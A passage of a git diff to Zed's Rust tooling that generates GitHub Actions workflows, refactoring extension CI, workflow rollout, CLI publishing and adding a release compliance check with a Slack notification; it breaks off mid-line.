.add_env(("PACKAGE_NAME", package_name.to_string())) +} + +fn run_clippy(package_name: &StepOutput) -> Step { + named::bash(r#"cargo clippy -p "$PACKAGE_NAME" --release --all-features -- --deny warnings"#) + .add_env(("PACKAGE_NAME", package_name.to_string())) +} + +fn run_nextest(package_name: &StepOutput) -> Step { + named::bash( + r#"cargo nextest run -p "$PACKAGE_NAME" --no-fail-fast --no-tests=warn --target "$(rustc -vV | sed -n 's|host: ||p')""#, + ) + .add_env(("PACKAGE_NAME", package_name.to_string())) + .add_env(("NEXTEST_NO_TESTS", "warn")) +} + +fn extension_job_defaults() -> Defaults { + Defaults::default().run( + RunDefaults::default() + .shell(BASH_SHELL) + .working_directory("${{ inputs.working-directory }}"), + ) +} + +fn with_extension_defaults(named_job: NamedJob) -> NamedJob { + NamedJob { + name: named_job.name, + job: named_job.job.defaults(extension_job_defaults()), + } } fn check_rust() -> NamedJob { + let (get_package, package_name) = get_package_name(); + let job = Job::default() + .defaults(extension_job_defaults()) .with_repository_owner_guard() .runs_on(runners::LINUX_LARGE_RAM) .timeout_minutes(6u32) .add_step(steps::checkout_repo()) .add_step(steps::cache_rust_dependencies_namespace()) .add_step(install_rust_target()) - .add_step(steps::cargo_fmt()) - .add_step(run_clippy()) + .add_step(get_package) + .add_step(cargo_fmt_package(&package_name)) + .add_step(run_clippy(&package_name)) .add_step(steps::cargo_install_nextest()) - .add_step( - steps::cargo_nextest(runners::Platform::Linux) - // Set the target to the current platform again - .with_target("$(rustc -vV | sed -n 's|host: ||p')") - .add_env(("NEXTEST_NO_TESTS", "warn")), - ); + .add_step(run_nextest(&package_name)); named::job(job) } @@ -86,6 +136,7 @@ pub(crate) fn check_extension() -> NamedJob { let (check_version_job, version_changed, _) = compare_versions(); let job = Job::default() + .defaults(extension_job_defaults()) .with_repository_owner_guard() .runs_on(runners::LINUX_LARGE_RAM) .timeout_minutes(6u32) @@ -94,6 +145,8 @@ pub(crate) fn check_extension() -> NamedJob { .add_step(download_zed_extension_cli(cache_hit)) .add_step(cache_rust_dependencies_namespace()) // Extensions can compile Rust, so provide the cache if needed. .add_step(check()) + .add_step(fetch_ts_query_ls()) + .add_step(run_ts_query_ls()) .add_step(check_version_job) .add_step(verify_version_did_not_change(version_changed)); @@ -120,8 +173,8 @@ pub fn download_zed_extension_cli(cache_hit: StepOutput) -> Step { named::bash( indoc! { r#" - wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension" - chmod +x zed-extension + wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension" -O "$GITHUB_WORKSPACE/zed-extension" + chmod +x "$GITHUB_WORKSPACE/zed-extension" "#, } ).if_condition(Expression::new(format!("{} != 'true'", cache_hit.expr()))) @@ -132,18 +185,20 @@ pub fn check() -> Step { r#" mkdir -p /tmp/ext-scratch mkdir -p /tmp/ext-output - ./zed-extension --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output + "$GITHUB_WORKSPACE/zed-extension" --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output "# }) } fn verify_version_did_not_change(version_changed: StepOutput) -> Step { - named::bash(formatdoc! {r#" - if [[ {version_changed} == "true" && "${{{{ github.event_name }}}}" == "pull_request" && "${{{{ github.event.pull_request.user.login }}}}" != "zed-zippy[bot]" ]] ; then + named::bash(indoc! {r#" + if [[ "$VERSION_CHANGED" == "true" && "$GITHUB_EVENT_NAME" == "pull_request" && "$PR_USER_LOGIN" != "zed-zippy[bot]" ]] ; then echo "Version change detected in your change!" echo "Version changes happen in separate PRs and will be performed by the zed-zippy bot" exit 42 fi "# }) + .add_env(("VERSION_CHANGED", version_changed.to_string())) + .add_env(("PR_USER_LOGIN", "${{ github.event.pull_request.user.login }}")) } diff --git a/tooling/xtask/src/tasks/workflows/extension_workflow_rollout.rs b/tooling/xtask/src/tasks/workflows/extension_workflow_rollout.rs index 2ba6069c273e8a3e9a27885595d2ad5380748cdd..1145cf2b5a70c30ac7212f6002e653d1396d55c4 100644 --- a/tooling/xtask/src/tasks/workflows/extension_workflow_rollout.rs +++ b/tooling/xtask/src/tasks/workflows/extension_workflow_rollout.rs @@ -6,46 +6,74 @@ use indoc::indoc; use serde_json::json; use crate::tasks::workflows::steps::CheckoutStep; +use crate::tasks::workflows::steps::TokenPermissions; +use crate::tasks::workflows::steps::cache_rust_dependencies_namespace; +use crate::tasks::workflows::vars::JobOutput; use crate::tasks::workflows::{ - extension_bump::{RepositoryTarget, generate_token}, runners, - steps::{self, DEFAULT_REPOSITORY_OWNER_GUARD, NamedJob, named}, - vars::{self, StepOutput}, + steps::{ + self, DEFAULT_REPOSITORY_OWNER_GUARD, NamedJob, RepositoryTarget, generate_token, named, + }, + vars::{self, StepOutput, WorkflowInput}, }; const ROLLOUT_TAG_NAME: &str = "extension-workflows"; +const WORKFLOW_ARTIFACT_NAME: &str = "extension-workflow-files"; pub(crate) fn extension_workflow_rollout() -> Workflow { - let fetch_repos = fetch_extension_repos(); - let rollout_workflows = rollout_workflows_to_extension(&fetch_repos); - let create_tag = create_rollout_tag(&rollout_workflows); + let filter_repos_input = WorkflowInput::string("filter-repos", Some(String::new())) + .description( + "Comma-separated list of repository names to rollout to. Leave empty for all repos.", + ); + let extra_context_input = WorkflowInput::string("change-description", Some(String::new())) + .description("Description for the changes to be expected with this rollout"); + + let (fetch_repos, removed_ci, removed_shared) = fetch_extension_repos(&filter_repos_input); + let rollout_workflows = rollout_workflows_to_extension( + &fetch_repos, + removed_ci, + removed_shared, + &extra_context_input, + ); + let create_tag = create_rollout_tag(&rollout_workflows, &filter_repos_input); named::workflow() - .on(Event::default().workflow_dispatch(WorkflowDispatch::default())) + .on(Event::default().workflow_dispatch( + WorkflowDispatch::default() + .add_input(filter_repos_input.name, filter_repos_input.input()) + .add_input(extra_context_input.name, extra_context_input.input()), + )) .add_env(("CARGO_TERM_COLOR", "always")) .add_job(fetch_repos.name, fetch_repos.job) .add_job(rollout_workflows.name, rollout_workflows.job) .add_job(create_tag.name, create_tag.job) } -fn fetch_extension_repos() -> NamedJob { - fn get_repositories() -> (Step, StepOutput) { - let step = named::uses("actions", "github-script", "v7") +fn fetch_extension_repos(filter_repos_input: &WorkflowInput) -> (NamedJob, JobOutput, JobOutput) { + fn get_repositories(filter_repos_input: &WorkflowInput) -> (Step, StepOutput) { + let step = named::uses("actions", "github-script", "f28e40c7f34bde8b3046d885e986cb6290c5673b") .id("list-repos") .add_with(( "script", - indoc::indoc! {r#" - const repos = await github.paginate(github.rest.repos.listForOrg, { + formatdoc! {r#" + const repos = await github.paginate(github.rest.repos.listForOrg, {{ org: 'zed-extensions', type: 'public', per_page: 100, - }); + }}); - const filteredRepos = repos + let filteredRepos = repos .filter(repo => !repo.archived) .map(repo => repo.name); - console.log(`Found ${filteredRepos.length} extension repos`); + const filterInput = `{filter_repos_input}`.trim(); + if (filterInput.length > 0) {{ + const allowedNames = filterInput.split(',').map(s => s.trim()).filter(s => s.length > 0); + filteredRepos = filteredRepos.filter(name => allowedNames.includes(name)); + console.log(`Filter applied. Matched ${{filteredRepos.length}} repos from ${{allowedNames.length}} requested.`); + }} + + console.log(`Found ${{filteredRepos.length}} extension repos`); return filteredRepos; "#}, )) @@ -56,36 +84,12 @@ fn fetch_extension_repos() -> NamedJob { (step, filtered_repos) } - let (get_org_repositories, list_repos_output) = get_repositories(); - - let job = Job::default() - .cond(Expression::new(format!( - "{DEFAULT_REPOSITORY_OWNER_GUARD} && github.ref == 'refs/heads/main'" - ))) - .runs_on(runners::LINUX_SMALL) - .timeout_minutes(5u32) - .outputs([("repos".to_owned(), list_repos_output.to_string())]) - .add_step(get_org_repositories); - - named::job(job) -} - -fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob { fn checkout_zed_repo() -> CheckoutStep { steps::checkout_repo() .with_full_history() - .with_path("zed") .with_custom_name("checkout_zed_repo") } - fn checkout_extension_repo(token: &StepOutput) -> CheckoutStep { - steps::checkout_repo() - .with_custom_name("checkout_extension_repo") - .with_token(token) - .with_repository("zed-extensions/${{ matrix.repo }}") - .with_path("extension") - } - fn get_previous_tag_commit() -> (Step, StepOutput) { let step = named::bash(formatdoc! {r#" PREV_COMMIT=$(git rev-parse "{ROLLOUT_TAG_NAME}^{{commit}}" 2>/dev/null || echo "") @@ -96,51 +100,127 @@ fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob { echo "Found previous rollout at commit: $PREV_COMMIT" echo "prev_commit=$PREV_COMMIT" >> "$GITHUB_OUTPUT" "#}) - .id("prev-tag") - .working_directory("zed"); + .id("prev-tag"); let step_output = StepOutput::new(&step, "prev_commit"); (step, step_output) } - fn get_removed_files(prev_commit: &StepOutput) -> (Step, StepOutput) { - let step = named::bash(formatdoc! {r#" - PREV_COMMIT="{prev_commit}" + fn get_removed_files(prev_commit: &StepOutput) -> (Step, StepOutput, StepOutput) { + let step = named::bash(indoc! {r#" + for workflow_type in "ci" "shared"; do + if [ "$workflow_type" = "ci" ]; then + WORKFLOW_DIR="extensions/workflows" + else + WORKFLOW_DIR="extensions/workflows/shared" + fi + + REMOVED=$(git diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \ + awk '/^D/ { print $2 } /^R/ { print $2 }' | \ + xargs -I{} basename {} 2>/dev/null | \ + tr '\n' ' ' || echo "") + REMOVED=$(echo "$REMOVED" | xargs) + + echo "Removed files for $workflow_type: $REMOVED" + echo "removed_${workflow_type}=$REMOVED" >> "$GITHUB_OUTPUT" + done + "#}) + .id("calc-changes") + .add_env(("PREV_COMMIT", prev_commit.to_string())); - if [ "${{{{ matrix.repo }}}}" = "workflows" ]; then - WORKFLOW_DIR="extensions/workflows" - else - WORKFLOW_DIR="extensions/workflows/shared" - fi + // These are created in the for-loop above and thus do exist + let removed_ci = StepOutput::new_unchecked(&step, "removed_ci"); + let removed_shared = StepOutput::new_unchecked(&step, "removed_shared"); - echo "Calculating changes from $PREV_COMMIT to HEAD for $WORKFLOW_DIR" + (step, removed_ci, removed_shared) + } - # Get deleted files (status D) and renamed files (status R - old name needs removal) - # Using -M to detect renames, then extracting files that are gone from their original location - REMOVED_FILES=$(git diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \ - awk '/^D/ {{ print $2 }} /^R/ {{ print $2 }}' | \ - xargs -I{{}} basename {{}} 2>/dev/null | \ - tr '\n' ' ' || echo "") + fn generate_workflow_files() -> Step { + named::bash(indoc! {r#" + cargo xtask workflows "$COMMIT_SHA" + "#}) + .add_env(("COMMIT_SHA", "${{ github.sha }}")) + } - REMOVED_FILES=$(echo "$REMOVED_FILES" | xargs) + fn upload_workflow_files() -> Step { + named::uses( + "actions", + "upload-artifact", + "330a01c490aca151604b8cf639adc76d48f6c5d4", // v5 + ) + .add_with(("name", WORKFLOW_ARTIFACT_NAME)) + .add_with(("path", "extensions/workflows/**/*.yml")) + .add_with(("if-no-files-found", "error")) + } - echo "Files to remove: $REMOVED_FILES" - echo "removed_files=$REMOVED_FILES" >> "$GITHUB_OUTPUT" - "#}) - .id("calc-changes") - .working_directory("zed"); + let (get_org_repositories, list_repos_output) = get_repositories(filter_repos_input); + let (get_prev_tag, prev_commit) = get_previous_tag_commit(); + let (calc_changes, removed_ci, removed_shared) = get_removed_files(&prev_commit); - let removed_files = StepOutput::new(&step, "removed_files"); + let job = Job::default() + .cond(Expression::new(format!( + "{DEFAULT_REPOSITORY_OWNER_GUARD} && github.ref == 'refs/heads/main'" + ))) + .runs_on(runners::LINUX_SMALL) + .timeout_minutes(10u32) + .outputs([ + ("repos".to_owned(), list_repos_output.to_string()), + ("prev_commit".to_owned(), prev_commit.to_string()), + ("removed_ci".to_owned(), removed_ci.to_string()), + ("removed_shared".to_owned(), removed_shared.to_string()), + ]) + .add_step(checkout_zed_repo()) + .add_step(get_prev_tag) + .add_step(calc_changes) + .add_step(get_org_repositories) + .add_step(cache_rust_dependencies_namespace()) + .add_step(generate_workflow_files()) + .add_step(upload_workflow_files()); + + let job = named::job(job); + let (removed_ci, removed_shared) = ( + removed_ci.as_job_output(&job), + removed_shared.as_job_output(&job), + ); + + (job, removed_ci, removed_shared) +} - (step, removed_files) +fn rollout_workflows_to_extension( + fetch_repos_job: &NamedJob, + removed_ci: JobOutput, + removed_shared: JobOutput, + extra_context_input: &WorkflowInput, +) -> NamedJob { + fn checkout_extension_repo(token: &StepOutput) -> CheckoutStep { + steps::checkout_repo() + .with_custom_name("checkout_extension_repo") + .with_token(token) + .with_repository("zed-extensions/${{ matrix.repo }}") + .with_path("extension") } - fn sync_workflow_files(removed_files: &StepOutput) -> Step { - named::bash(formatdoc! {r#" - REMOVED_FILES="{removed_files}" + fn download_workflow_files() -> Step { + named::uses( + "actions", + "download-artifact", + "018cc2cf5baa6db3ef3c5f8a56943fffe632ef53", // v6.0.0 + ) + .add_with(("name", WORKFLOW_ARTIFACT_NAME)) + .add_with(("path", "workflow-files")) + } + fn sync_workflow_files(removed_ci: JobOutput, removed_shared: JobOutput) -> Step { + named::bash(indoc! {r#" mkdir -p extension/.github/workflows + + if [ "$MATRIX_REPO" = "workflows" ]; then + REMOVED_FILES="$REMOVED_CI" + else + REMOVED_FILES="$REMOVED_SHARED" + fi + cd extension/.github/workflows if [ -n "$REMOVED_FILES" ]; then @@ -153,80 +233,95 @@ fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob { cd - > /dev/null - if [ "${{{{ matrix.repo }}}}" = "workflows" ]; then - cp zed/extensions/workflows/*.yml extension/.github/workflows/ + if [ "$MATRIX_REPO" = "workflows" ]; then + cp workflow-files/*.yml extension/.github/workflows/ else - cp zed/extensions/workflows/shared/*.yml extension/.github/workflows/ + cp workflow-files/shared/*.yml extension/.github/workflows/ fi "#}) + .add_env(("REMOVED_CI", removed_ci)) + .add_env(("REMOVED_SHARED", removed_shared)) + .add_env(("MATRIX_REPO", "${{ matrix.repo }}")) } fn get_short_sha() -> (Step, StepOutput) { - let step = named::bash(indoc::indoc! {r#" - echo "sha_short=$(git rev-parse --short=7 HEAD)" >> "$GITHUB_OUTPUT" + let step = named::bash(indoc! {r#" + echo "sha_short=$(echo "$GITHUB_SHA" | cut -c1-7)" >> "$GITHUB_OUTPUT" "#}) - .id("short-sha") - .working_directory("zed"); + .id("short-sha"); let step_output = StepOutput::new(&step, "sha_short"); (step, step_output) } - fn create_pull_request(token: &StepOutput, short_sha: &StepOutput) -> Step { + fn create_pull_request( + token: &StepOutput, + short_sha: &StepOutput, + context_input: &WorkflowInput, + ) -> Step { let title = format!("Update CI workflows to `{short_sha}`"); - named::uses("peter-evans", "create-pull-request", "v7") - .add_with(("path", "extension")) - .add_with(("title", title.clone())) - .add_with(( - "body", - indoc::indoc! {r#" - This PR updates the CI workflow files from the main Zed repository - based on the commit zed-industries/zed@${{ github.sha }} - "#}, - )) - .add_with(("commit-message", title)) - .add_with(("branch", "update-workflows")) - .add_with(( - "committer", - "zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>", - )) - .add_with(( - "author", - "zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>", - )) - .add_with(("base", "main")) - .add_with(("delete-branch", true)) - .add_with(("token", token.to_string())) - .add_with(("sign-commits", true)) - .id("create-pr") + let body = formatdoc! {r#" + This PR updates the CI workflow files from the main Zed repository + based on the commit zed-industries/zed@${{{{ github.sha }}}} + + {context_input} + "#, + }; + + named::uses( + "peter-evans", + "create-pull-request", + "98357b18bf14b5342f975ff684046ec3b2a07725", + ) + .add_with(("path", "extension")) + .add_with(("title", title.clone())) + .add_with(("body", body)) + .add_with(("commit-message", title)) + .add_with(("branch", "update-workflows")) + .add_with(( + "committer", + "zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>", + )) + .add_with(( + "author", + "zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>", + )) + .add_with(("base", "main")) + .add_with(("delete-branch", true)) + .add_with(("token", token.to_string())) + .add_with(("sign-commits", true)) + .id("create-pr") } fn enable_auto_merge(token: &StepOutput) -> Step { - named::bash(indoc::indoc! {r#" - PR_NUMBER="${{ steps.create-pr.outputs.pull-request-number }}" + named::bash(indoc! {r#" if [ -n "$PR_NUMBER" ]; then - cd extension gh pr merge "$PR_NUMBER" --auto --squash fi "#}) + .working_directory("extension") .add_env(("GH_TOKEN", token.to_string())) + .add_env(( + "PR_NUMBER", + "${{ steps.create-pr.outputs.pull-request-number }}", + )) } - let (authenticate, token) = generate_token( - vars::ZED_ZIPPY_APP_ID, - vars::ZED_ZIPPY_APP_PRIVATE_KEY, - Some( - RepositoryTarget::new("zed-extensions", &["${{ matrix.repo }}"]).permissions([ - ("permission-pull-requests".to_owned(), Level::Write), - ("permission-contents".to_owned(), Level::Write), - ("permission-workflows".to_owned(), Level::Write), - ]), - ), - ); - let (get_prev_tag, prev_commit) = get_previous_tag_commit(); - let (calc_changes, removed_files) = get_removed_files(&prev_commit); + let (authenticate, token) = + generate_token(vars::ZED_ZIPPY_APP_ID, vars::ZED_ZIPPY_APP_PRIVATE_KEY) + .for_repository(RepositoryTarget::new( + "zed-extensions", + &["${{ matrix.repo }}"], + )) + .with_permissions([ + (TokenPermissions::PullRequests, Level::Write), + (TokenPermissions::Contents, Level::Write), + (TokenPermissions::Workflows, Level::Write), + ]) + .into(); + let (calculate_short_sha, short_sha) = get_short_sha(); let job = Job::default() @@ -246,19 +341,17 @@ fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob { })), ) .add_step(authenticate) - .add_step(checkout_zed_repo()) .add_step(checkout_extension_repo(&token)) - .add_step(get_prev_tag) - .add_step(calc_changes) - .add_step(sync_workflow_files(&removed_files)) + .add_step(download_workflow_files()) + .add_step(sync_workflow_files(removed_ci, removed_shared)) .add_step(calculate_short_sha) - .add_step(create_pull_request(&token, &short_sha)) + .add_step(create_pull_request(&token, &short_sha, extra_context_input)) .add_step(enable_auto_merge(&token)); named::job(job) } -fn create_rollout_tag(rollout_job: &NamedJob) -> NamedJob { +fn create_rollout_tag(rollout_job: &NamedJob, filter_repos_input: &WorkflowInput) -> NamedJob { fn checkout_zed_repo(token: &StepOutput) -> CheckoutStep { steps::checkout_repo().with_full_history().with_token(token) } @@ -283,17 +376,18 @@ fn create_rollout_tag(rollout_job: &NamedJob) -> NamedJob { "#}) } - let (authenticate, token) = generate_token( - vars::ZED_ZIPPY_APP_ID, - vars::ZED_ZIPPY_APP_PRIVATE_KEY, - Some( - RepositoryTarget::current() - .permissions([("permission-contents".to_owned(), Level::Write)]), - ), - ); + let (authenticate, token) = + generate_token(vars::ZED_ZIPPY_APP_ID, vars::ZED_ZIPPY_APP_PRIVATE_KEY) + .for_repository(RepositoryTarget::current()) + .with_permissions([(TokenPermissions::Contents, Level::Write)]) + .into(); let job = Job::default() .needs([rollout_job.name.clone()]) + .cond(Expression::new(format!( + "{filter_repos} == ''", + filter_repos = filter_repos_input.expr(), + ))) .runs_on(runners::LINUX_SMALL) .timeout_minutes(1u32) .add_step(authenticate) diff --git a/tooling/xtask/src/tasks/workflows/extensions/bump_version.rs b/tooling/xtask/src/tasks/workflows/extensions/bump_version.rs index 2d82f1351f21645a77b1d13e158bd4142dbec069..4dc2560e2bea489566fb8eb5ad5d04701835de29 100644 --- a/tooling/xtask/src/tasks/workflows/extensions/bump_version.rs +++ b/tooling/xtask/src/tasks/workflows/extensions/bump_version.rs @@ -5,17 +5,18 @@ use gh_workflow::{ use indoc::indoc; use crate::tasks::workflows::{ + GenerateWorkflowArgs, GitSha, extensions::WithAppSecrets, runners, steps::{CommonJobConditions, NamedJob, named}, vars::{JobOutput, StepOutput, one_workflow_per_non_main_branch_and_token}, }; -pub(crate) fn bump_version() -> Workflow { +pub(crate) fn bump_version(args: &GenerateWorkflowArgs) -> Workflow { let (determine_bump_type, bump_type) = determine_bump_type(); let bump_type = bump_type.as_job_output(&determine_bump_type); - let call_bump_version = call_bump_version(&determine_bump_type, bump_type); + let call_bump_version = call_bump_version(args.sha.as_ref(), &determine_bump_type, bump_type); named::workflow() .on(Event::default() @@ -32,6 +33,7 @@ pub(crate) fn bump_version() -> Workflow { } pub(crate) fn call_bump_version( + target_ref: Option<&GitSha>, depending_job: &NamedJob, bump_type: JobOutput, ) -> NamedJob { @@ -51,7 +53,7 @@ pub(crate) fn call_bump_version( "zed-industries", "zed", ".github/workflows/extension_bump.yml", - "main", + target_ref.map_or("main", AsRef::as_ref), ) .add_need(depending_job.name.clone()) .with( diff --git a/tooling/xtask/src/tasks/workflows/extensions/run_tests.rs b/tooling/xtask/src/tasks/workflows/extensions/run_tests.rs index 0c0ca696612fa57903f35c0ea69404f5dc7d1fe0..ae8000c15cad3a206b9c02f8bc389a369f4df096 100644 --- a/tooling/xtask/src/tasks/workflows/extensions/run_tests.rs +++ b/tooling/xtask/src/tasks/workflows/extensions/run_tests.rs @@ -1,12 +1,13 @@ use gh_workflow::{Event, Job, Level, Permissions, PullRequest, Push, UsesJob, Workflow}; use crate::tasks::workflows::{ + GenerateWorkflowArgs, GitSha, steps::{NamedJob, named}, vars::one_workflow_per_non_main_branch_and_token, }; -pub(crate) fn run_tests() -> Workflow { - let call_extension_tests = call_extension_tests(); +pub(crate) fn run_tests(args: &GenerateWorkflowArgs) -> Workflow { + let call_extension_tests = call_extension_tests(args.sha.as_ref()); named::workflow() .on(Event::default() .pull_request(PullRequest::default().add_branch("**")) @@ -15,14 +16,14 @@ pub(crate) fn run_tests() -> Workflow { .add_job(call_extension_tests.name, call_extension_tests.job) } -pub(crate) fn call_extension_tests() -> NamedJob { +pub(crate) fn call_extension_tests(target_ref: Option<&GitSha>) -> NamedJob { let job = Job::default() .permissions(Permissions::default().contents(Level::Read)) .uses( "zed-industries", "zed", ".github/workflows/extension_tests.yml", - "main", + target_ref.map_or("main", AsRef::as_ref), ); named::job(job) diff --git a/tooling/xtask/src/tasks/workflows/publish_extension_cli.rs b/tooling/xtask/src/tasks/workflows/publish_extension_cli.rs index 549b0fdfcfbb8f44b24ac849e2fe3c13bf5acdb0..9f8d054241507af8597e2ff328263c440377686f 100644 --- a/tooling/xtask/src/tasks/workflows/publish_extension_cli.rs +++ b/tooling/xtask/src/tasks/workflows/publish_extension_cli.rs @@ -2,9 +2,8 @@ use gh_workflow::{ctx::Context, *}; use indoc::indoc; use crate::tasks::workflows::{ - extension_bump::{RepositoryTarget, generate_token}, runners, - steps::{self, CommonJobConditions, NamedJob, named}, + steps::{self, CommonJobConditions, NamedJob, RepositoryTarget, generate_token, named}, vars::{self, StepOutput}, }; @@ -28,7 +27,7 @@ fn publish_job() -> NamedJob { } fn upload_binary() -> Step { - named::bash("script/upload-extension-cli ${{ github.sha }}") + named::bash(r#"script/upload-extension-cli "$GITHUB_SHA""#) .add_env(( "DIGITALOCEAN_SPACES_ACCESS_KEY", vars::DIGITALOCEAN_SPACES_ACCESS_KEY, @@ -42,7 +41,7 @@ fn publish_job() -> NamedJob { named::job( Job::default() .with_repository_owner_guard() - .runs_on(runners::LINUX_SMALL) + .runs_on(runners::LINUX_DEFAULT) .add_step(steps::checkout_repo()) .add_step(steps::cache_rust_dependencies_namespace()) .add_step(steps::setup_linux()) @@ -52,15 +51,12 @@ fn publish_job() -> NamedJob { } fn update_sha_in_zed(publish_job: &NamedJob) -> NamedJob { - let (generate_token, generated_token) = generate_token( - vars::ZED_ZIPPY_APP_ID, - vars::ZED_ZIPPY_APP_PRIVATE_KEY, - Some(RepositoryTarget::current()), - ); + let (generate_token, generated_token) = + generate_token(vars::ZED_ZIPPY_APP_ID, vars::ZED_ZIPPY_APP_PRIVATE_KEY).into(); fn replace_sha() -> Step { named::bash(indoc! {r#" - sed -i "s/ZED_EXTENSION_CLI_SHA: &str = \"[a-f0-9]*\"/ZED_EXTENSION_CLI_SHA: \&str = \"${{ github.sha }}\"/" \ + sed -i "s/ZED_EXTENSION_CLI_SHA: &str = \"[a-f0-9]*\"/ZED_EXTENSION_CLI_SHA: \&str = \"$GITHUB_SHA\"/" \ tooling/xtask/src/tasks/workflows/extension_tests.rs "#}) } @@ -92,7 +88,7 @@ fn create_pull_request_zed(generated_token: &StepOutput, short_sha: &StepOutput) short_sha ); - named::uses("peter-evans", "create-pull-request", "v7").with( + named::uses("peter-evans", "create-pull-request", "98357b18bf14b5342f975ff684046ec3b2a07725").with( Input::default() .add("title", title.clone()) .add( @@ -121,11 +117,10 @@ fn create_pull_request_zed(generated_token: &StepOutput, short_sha: &StepOutput) fn update_sha_in_extensions(publish_job: &NamedJob) -> NamedJob { let extensions_repo = RepositoryTarget::new("zed-industries", &["extensions"]); - let (generate_token, generated_token) = generate_token( - vars::ZED_ZIPPY_APP_ID, - vars::ZED_ZIPPY_APP_PRIVATE_KEY, - Some(extensions_repo), - ); + let (generate_token, generated_token) = + generate_token(vars::ZED_ZIPPY_APP_ID, vars::ZED_ZIPPY_APP_PRIVATE_KEY) + .for_repository(extensions_repo) + .into(); fn checkout_extensions_repo(token: &StepOutput) -> Step { named::uses( @@ -139,7 +134,7 @@ fn update_sha_in_extensions(publish_job: &NamedJob) -> NamedJob { fn replace_sha() -> Step { named::bash(indoc! {r#" - sed -i "s/ZED_EXTENSION_CLI_SHA: [a-f0-9]*/ZED_EXTENSION_CLI_SHA: ${{ github.sha }}/" \ + sed -i "s/ZED_EXTENSION_CLI_SHA: [a-f0-9]*/ZED_EXTENSION_CLI_SHA: $GITHUB_SHA/" \ .github/workflows/ci.yml "#}) } @@ -165,7 +160,7 @@ fn create_pull_request_extensions( ) -> Step { let title = format!("Bump extension CLI version to `{}`", short_sha); - named::uses("peter-evans", "create-pull-request", "v7").with( + named::uses("peter-evans", "create-pull-request", "98357b18bf14b5342f975ff684046ec3b2a07725").with( Input::default() .add("title", title.clone()) .add( @@ -191,7 +186,7 @@ fn create_pull_request_extensions( fn get_short_sha() -> (Step, StepOutput) { let step = named::bash(indoc::indoc! {r#" - echo "sha_short=$(echo "${{ github.sha }}" | cut -c1-7)" >> "$GITHUB_OUTPUT" + echo "sha_short=$(echo "$GITHUB_SHA" | cut -c1-7)" >> "$GITHUB_OUTPUT" "#}) .id("short-sha"); diff --git a/tooling/xtask/src/tasks/workflows/release.rs b/tooling/xtask/src/tasks/workflows/release.rs index 8241fc58f0821b950e32ee9b1a42473975ec008d..3efe3e7c5c127e8580a9ca22d2d0e1ab4e7c80e9 100644 --- a/tooling/xtask/src/tasks/workflows/release.rs +++ b/tooling/xtask/src/tasks/workflows/release.rs @@ -1,11 +1,13 @@ -use gh_workflow::{Event, Expression, Push, Run, Step, Use, Workflow, ctx::Context}; +use gh_workflow::{Event, Expression, Job, Push, Run, Step, Use, Workflow, ctx::Context}; use indoc::formatdoc; use crate::tasks::workflows::{ run_bundling::{bundle_linux, bundle_mac, bundle_windows}, run_tests, runners::{self, Arch, Platform}, - steps::{self, FluentBuilder, NamedJob, dependant_job, named, release_job}, + steps::{ + self, CommonJobConditions, FluentBuilder, NamedJob, dependant_job, named, release_job, + }, vars::{self, StepOutput, assets}, }; @@ -16,12 +18,13 @@ pub(crate) fn release() -> Workflow { let macos_tests = run_tests::run_platform_tests_no_filter(Platform::Mac); let linux_tests = run_tests::run_platform_tests_no_filter(Platform::Linux); let windows_tests = run_tests::run_platform_tests_no_filter(Platform::Windows); - let macos_clippy = run_tests::clippy(Platform::Mac); - let linux_clippy = run_tests::clippy(Platform::Linux); - let windows_clippy = run_tests::clippy(Platform::Windows); + let macos_clippy = run_tests::clippy(Platform::Mac, None); + let linux_clippy = run_tests::clippy(Platform::Linux, None); + let windows_clippy = run_tests::clippy(Platform::Windows, None); let check_scripts = run_tests::check_scripts(); let create_draft_release = create_draft_release(); + let compliance = compliance_check(); let bundle = ReleaseBundleJobs { linux_aarch64: bundle_linux( @@ -92,6 +95,7 @@ pub(crate) fn release() -> Workflow { .add_job(windows_clippy.name, windows_clippy.job) .add_job(check_scripts.name, check_scripts.job) .add_job(create_draft_release.name, create_draft_release.job) + .add_job(compliance.name, compliance.job) .map(|mut workflow| { for job in bundle.into_jobs() { workflow = workflow.add_job(job.name, job.job); @@ -149,6 +153,59 @@ pub(crate) fn create_sentry_release() -> Step { .add_with(("environment", "production")) } +fn compliance_check() -> NamedJob { + fn run_compliance_check() -> Step { + named::bash( + r#"cargo xtask compliance "$GITHUB_REF_NAME" --report-path "$COMPLIANCE_FILE_OUTPUT""#, + ) + .id("run-compliance-check") + .add_env(("GITHUB_APP_ID", vars::ZED_ZIPPY_APP_ID)) + .add_env(("GITHUB_APP_KEY", vars::ZED_ZIPPY_APP_PRIVATE_KEY)) + } + + fn send_compliance_slack_notification() -> Step { + named::bash(indoc::indoc! {r#" + if [ "$COMPLIANCE_OUTCOME" == "success" ]; then + STATUS="✅ Compliance check passed for $GITHUB_REF_NAME" + else + STATUS="❌ Compliance check failed for $GITHUB_REF_NAME" + fi + + REPORT_CONTENT="" + if [ -f "$COMPLIANCE_FILE_OUTPUT" ]; then + REPORT_CONTENT=$(cat "$REPORT_FILE") + fi + + MESSAGE=$(printf "%s\n\n%s" "$STATUS" "$REPORT_CONTENT") + + curl -X POST -H 'Content-type: application/json' \ + --data "$(jq -n --arg text "$MESSAGE" '{"text": $text}')" \ + "$SLACK_WEBHOOK" + "#}) + .if_condition(Expression::new("always()")) + .add_env(("SLACK_WEBHOOK", vars::SLACK_WEBHOOK_WORKFLOW_FAILURES)) + .add_env(( + "COMPLIANCE_OUTCOME", + "${{ steps.run-compliance-check.outcome 